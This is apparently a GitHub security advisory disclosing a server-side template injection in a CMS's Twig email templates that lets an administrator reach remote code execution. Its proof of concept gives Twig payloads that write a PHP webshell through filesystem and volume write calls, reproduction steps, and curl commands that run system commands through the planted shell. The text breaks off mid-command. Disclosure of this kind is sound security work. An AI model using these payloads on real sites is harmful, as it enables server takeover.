GHSA-v47q-jxvr-p68x

Summary

An authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the craft.app.fs.write() method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands.

Proof of Concept

Attack Prerequisites

• Authenticated administrator account with allowAdminChanges enabled, or access to the System Messages utility

Steps to Reproduce

1. Navigate to Utilities → System Messages (/admin/utilities/system-messages)
2. Edit any email template (e.g., "Test Email") and inject the following in the body (or the Subject):
   • To exploit it by writing to a file system:
     • Note: Replace the filesystem handle (e.g., hardDisk) with a valid handle configured in the target installation.

     {{ craft.app.fs.getFilesystemByHandle('hardDisk').write('shell.php', '<?php isset($_GET["c"]) ? system($_GET["c"]) : null; ?>') }}
     

   • To exploit it by writing to a volume:
     • Note: Replace the volume handle (e.g., images) with a valid handle configured in the target installation.

     {{ craft.app.volumes.getVolumeByHandle('images').fs.write('shell.php', '<?php isset($_GET["c"]) ? system($_GET["c"]) : null; ?>') }}
     

   <img width="982" height="901" alt="payload-injection" src="https://github.com/user-attachments/assets/86fbb99c-a551-4395-93a1-30e62e77c57e" />
3. Save & go to Settings → Email (/admin/settings/email)
4. Click "Test" at the bottom of the page to trigger template rendering
5. The webshell is now written to the filesystem/volume. Access it via curl or directly from the browser: Note: The path might be different on your end depending on the filesystem or volume configuration.

   # For Filesystem
   curl "http://target.com/uploads/shell.php?c=id"
   # For Volume
   curl...